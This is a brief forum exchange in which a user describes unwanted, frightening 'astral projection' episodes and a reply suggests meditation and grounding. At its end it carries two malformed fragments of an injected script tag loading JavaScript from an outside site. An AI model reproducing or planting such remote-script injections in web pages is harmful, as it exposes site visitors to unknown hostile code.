Need help with control

I have found myself astral projecting against my will numerous times. I always manage to pull myself back but it terrifies me because I have no control over it and I get stuck in one place. The only reason it really scares me is because I get this terrible feeling, I'm trying to find a way to describe it but I can't seem to, I have typed the description but it never comes out right. I have had the same experiences, and it is scary. I felt maybe my own fear also made it worse, or it was my own fear created it sort of. One time I tried to tell myself that it is no point of being afraid, and tried to take control, and it did help a little. have you tried to do some meditation or grounding yourself? that may help since most gifts go with the person's emotions. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
